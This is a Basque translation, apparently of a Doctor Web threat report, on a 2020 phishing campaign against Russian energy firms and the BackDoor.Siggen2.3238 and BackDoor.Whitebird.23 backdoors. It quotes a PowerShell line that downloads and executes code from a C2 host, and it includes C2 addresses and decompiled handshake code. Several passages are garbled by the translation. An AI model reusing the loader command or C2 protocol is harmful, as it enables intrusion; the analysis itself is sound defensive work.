Segurtasun informatikoko gorabeherak ikertzean dugun esperientziak erakusten du posta elektronikoa dela oraindik erasotzaileek erasotzaileek hasiera batean erasotutako sare-azpiegituretan sartzeko erabiltzen duten biderik ohikoenetako bat. Gutun susmagarri (edo ez hain susmagarria) duen ekintza arduragabe bat infekzio gehiagorako sarrera-puntu bihurtzen da, horregatik ziber-kriminalak aktiboki erabiltzen ari dira ingeniaritza sozialeko metodoak, arrakasta-maila desberdinak izan arren.
Argitalpen honetan Errusiako erregai eta energia konplexuko hainbat enpresari zuzendutako spam kanpaina bati buruz egin dugun azken ikerketari buruz hitz egin nahi dugu. Eraso guztiek agertoki bera jarraitu zuten mezu elektroniko faltsuak erabiliz, eta ez omen zuen inork ahalegin handirik egin mezu elektroniko horien testu-edukian.
Inteligentzia zerbitzua
Dena 2020ko apirilaren amaieran hasi zen, Doctor Web birusen analistek spam kanpaina bat detektatu zutenean, non hacker-ek telefono-gida eguneratua bidaltzen zien Errusiako erregai eta energia konplexuko hainbat enpresatako langileei. Jakina, hau ez zen kezka erakustaldi soila izan, direktorioa ez baitzen benetakoa, eta .docx dokumentuek urruneko baliabideetatik bi irudi deskargatzen baitzituzten.
Horietako bat erabiltzailearen ordenagailura deskargatu zen news[.]zannews[.]com zerbitzaritik. Azpimarratzekoa da domeinu-izena Kazakhstango ustelkeriaren aurkako hedabideen domeinuaren antzekoa dela - zannews[.]kz. Bestalde, erabilitako domeinuak berehala gogorarazten zuen TOPNEWS izenez ezagutzen zen 2015eko beste kanpaina bat, ICEFOG atzeko atea erabiltzen zuena eta Troiako kontroleko domeinuak zituen izenetan βberriβ azpikatea zutenak. Beste ezaugarri interesgarri bat hartzaile ezberdinei mezu elektronikoak bidaltzean, irudi bat deskargatzeko eskaerek eskaera-parametro desberdinak edo irudi-izen bereziak erabiltzen zituzten.
Hartzaile "fidagarri" bat identifikatzeko informazioa biltzeko helburuarekin egin zela uste dugu, orduan gutuna une egokian irekiko zuela bermatuta. Bigarren zerbitzaritik irudia deskargatzeko SMB protokoloa erabili zen, jasotako dokumentua ireki zuten langileen ordenagailuetatik NetNTLM hashak biltzeko egin zitekeen.
Eta hona hemen gutuna bera direktorioa faltsuarekin:
Aurtengo ekainean, hackerrak domeinu-izen berri bat erabiltzen hasi ziren, sports[.]manhajnews[.]com, irudiak igotzeko. Azterketak erakutsi zuen manhajnews[.]com azpidomeinuak spam bidalketetan erabiltzen direla gutxienez 2019ko irailetik. Kanpaina honen helburuetako bat Errusiako unibertsitate handi bat zen.
Gainera, ekainerako, erasoaren antolatzaileek testu berri bat atera zuten euren gutunetarako: oraingoan dokumentuak industriaren garapenari buruzko informazioa jasotzen zuen. Gutunaren testuak argi eta garbi adierazten zuen bere egilea ez zela errusiera jatorrizko hiztuna, edo nahita bere buruari buruz halako inpresioa sortzen ari zela. Zoritxarrez, industriaren garapenaren ideiak, beti bezala, estalki bat besterik ez ziren izan; dokumentuak berriro bi irudi deskargatu zituen, zerbitzaria[.]inklingpaper[.]com deskargatzeko aldatu zen bitartean.
Hurrengo berrikuntza uztailean izan zen. Birusen aurkako programek dokumentu gaiztoak hautematea saihestu nahian, erasotzaileak pasahitz batekin enkriptatutako Microsoft Word dokumentuak erabiltzen hasi ziren. Aldi berean, erasotzaileek ingeniaritza sozialeko teknika klasiko bat erabiltzea erabaki zuten: sari jakinarazpena.
Helegitearen testua estilo berean idatzi zen berriro, eta horrek susmo gehigarriak piztu zituen hartzailearen artean. Irudia deskargatzeko zerbitzaria ere ez da aldatu.
Kontuan izan, kasu guztietan, gutunak bidaltzeko mail[.]ru eta yandex[.]ru domeinuetan erregistratutako postontzi elektronikoak erabiltzen zirela.
eraso
2020ko irailaren hasieran, ekintzarako garaia zen. Gure birus-analistek eraso-bolada berri bat erregistratu zuten, erasotzaileek berriro gutunak bidali zituzten telefono-gida bat eguneratzeko aitzakiarekin. Hala ere, oraingoan eranskinak makro gaizto bat zuen.
Erantsitako dokumentua irekitzean, makroak bi fitxategi sortu zituen:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, batch fitxategi bat abiarazteko xedea zuena;
- Batch fitxategia bera %APPDATA%configstest.bat, lausotuta zegoen.
Bere lanaren funtsa Powershell shell-a parametro jakin batzuekin abiaraztera dator. Shellera pasatzen diren parametroak komandoetan deskodetzen dira:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Aurkeztutako komandoetatik ondorioztatzen den bezala, karga deskargatzen den domeinua berri gune gisa mozorrotuta dago berriro. Sinple bat , zeinaren zeregin bakarra komando eta kontrol zerbitzaritik shellcode jaso eta exekutatzeko. Biktimaren ordenagailuan instala daitezkeen bi atzeko ate mota identifikatu ahal izan ditugu.
BackDoor.Siggen2.3238
Lehenengoa da BackDoor.Siggen2.3238 β Gure espezialistek ez zuten aurretik topatu, eta ez zuten programa honen aipamenik izan beste birusen aurkako saltzaileek.
Programa hau C++-n idatzitako atzeko ate bat da eta 32 biteko Windows sistema eragileetan exekutatzen da.
BackDoor.Siggen2.3238 kudeaketa zerbitzariarekin komunikatzeko gai da bi protokolo erabiliz: HTTP eta HTTPS. Probatutako laginak HTTPS protokoloa erabiltzen du. Erabiltzaile-agente hau zerbitzariari egindako eskaeretan erabiltzen da:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Kasu honetan, eskaera guztiak honako parametro multzo hauekin ematen dira:
%s;type=%s;length=%s;realdata=%send
non %s lerro bakoitza dagokion ordez ordezkatzen den:
- Kutsatutako ordenagailuaren IDa,
- bidalitako eskaera mota,
- datuen luzera realdata eremuan,
- datuak.
Kutsatutako sistemari buruzko informazioa biltzeko fasean, atzeko ateak honelako lerro bat sortzen du:
lan=%s;cmpname=%s;username=%s;version=%s;
non lan kutsatutako ordenagailuaren IP helbidea den, cmpname ordenagailuaren izena da, username erabiltzaile izena da, bertsioa 0.0.4.03 lerroa da.
Sysinfo identifikatzailea duen informazio hori POST eskaera baten bidez bidaltzen da https[:]//31.214[.]157.14/log.txt helbidean dagoen kontrol-zerbitzariari. Erantzunean bada BackDoor.Siggen2.3238 HEART seinalea jasotzen du, konexioa arrakastatsutzat jotzen da eta atzeko ateak zerbitzariarekiko komunikazio-ziklo nagusia hasten du.
Funtzionamendu-printzipioen deskribapen zehatzagoa BackDoor.Siggen2.3238 gurean dago .
BackDoor.Whitebird.23
Bigarren programa BackDoor.Whitebird atzeko atearen aldaketa da, jadanik ezagutzen dugun Kazakhstango gobernu agentzia batekin izandako istiluagatik. Bertsio hau C++-n idatzita dago eta 32 biteko zein 64 biteko Windows sistema eragileetan exekutatzeko diseinatuta dago.
Mota honetako programa gehienak bezala, BackDoor.Whitebird.23 kontrol-zerbitzariarekin eta kutsatutako ordenagailu baten baimenik gabeko kontrol-enkriptatutako konexio bat ezartzeko diseinatua. Konpromisodun sistema batean instalatuta dago tanta bat erabiliz .
Aztertu genuen lagina liburutegi maltzur bat izan zen, bi esportaziorekin:
- Google Play
- Proba.
Bere lanaren hasieran, atzeko atearen gorputzean kableatutako konfigurazioa deszifratzen du 0x99 bytearekin XOR eragiketan oinarritutako algoritmo bat erabiliz. Konfigurazioa honelakoa da:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Bere etengabeko funtzionamendua ziurtatzeko, atzeko ateak eremuan zehaztutako balioa aldatzen du lan orduak konfigurazioak. Eremuak 1440 byte ditu, 0 edo 1 balioak hartzen dituztenak eta eguneko ordu bakoitzeko minutu bakoitza adierazten dutenak. Interfazea entzuten duen eta proxy zerbitzarian baimen-paketeak bilatzen dituen sare-interfaze bakoitzeko hari bereizi bat sortzen du kutsatutako ordenagailutik. Horrelako pakete bat detektatzen denean, atzeko ateak proxy zerbitzariari buruzko informazioa gehitzen du bere zerrendara. Horrez gain, WinAPI bidez proxy bat dagoen egiaztatzen du InternetQueryOptionW.
Programak uneko minutua eta ordua egiaztatzen ditu eta eremuko datuekin alderatzen ditu lan orduak konfigurazioak. Dagokion eguneko minutuaren balioa zero ez bada, orduan konexio bat ezartzen da kontrol-zerbitzariarekin.
Zerbitzariarekin konexioa ezartzeak bezeroaren eta zerbitzariaren arteko TLS bertsioa 1.0 protokoloa erabiliz konexio bat sortzea simulatzen du. Atzeko atearen gorputzak bi buffer ditu.
Lehenengo buffer-ak TLS 1.0 Client Hello paketea dauka.
Bigarren buffer-ak 1.0x0 byteko gako-luzera duten TLS 100 Bezeroaren gakoen truke-paketeak ditu, Aldatu Zifratze-zehaztapena, Enkriptatutako Handshake Mezua.
Client Hello pakete bat bidaltzean, atzeko ateak uneko orduko 4 byte eta 28 byte sasi-ausazko datu idazten ditu Bezeroaren Ausazko eremuan, honela kalkulatuta:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Jasotako paketea kontrol zerbitzarira bidaltzen da. Erantzunak (Zerbitzari Kaixo paketea) egiaztatzen du:
- TLS protokoloaren 1.0 bertsioa betetzea;
- Bezeroak zehaztutako denbora-zigiluaren (Ausazko Datu-paketearen eremuko lehen 4 byteak) zerbitzariak zehaztutako denbora-zigiluaren korrespondentzia;
- Bezeroaren eta zerbitzariaren Ausazko Datuen eremuko denbora-zigiluaren ondorengo lehen 4 byteen bat etortzea.
Zehaztutako bat-etortzeen kasuan, atzeko ateak bezeroaren gakoen truke pakete bat prestatzen du. Horretarako, gako publikoa aldatzen du Bezeroaren gakoen truke paketean, baita Encryption IV eta Encryption Data encrypted Handshake Message paketean ere.
Ondoren, atzeko ateak komando eta kontrol zerbitzaritik paketea jasotzen du, TLS protokoloaren bertsioa 1.0 dela egiaztatzen du eta, ondoren, beste 54 byte onartzen ditu (paketearen gorputza). Honek konexioaren konfigurazioa osatzen du.
Funtzionamendu-printzipioen deskribapen zehatzagoa BackDoor.Whitebird.23 gurean dago .
Ondorioa eta Ondorioak
Dokumentuen, malwarearen eta erabilitako azpiegituren azterketari esker, ziurtasunez esateko erasoa Txinako APT taldeetako batek prestatu zuen. Eraso arrakastatsua gertatuz gero biktimen ordenagailuetan instalatzen diren atzeko ateen funtzionaltasuna kontuan hartuta, infekzioak, gutxienez, erasotutako erakundeen ordenagailuetatik isilpeko informazioa lapurtzea dakar.
Horrez gain, oso litekeena den agertoki bat funtzio berezi bat duten tokiko zerbitzarietan troiako espezializatuak instalatzea da. Hauek izan daitezke domeinu-kontrolatzaileak, posta-zerbitzariak, Interneteko pasabideak, etab. Adibidean ikus genezakeen bezala , horrelako zerbitzariek interes berezia dute erasotzaileentzat hainbat arrazoirengatik.
Iturria: www.habr.com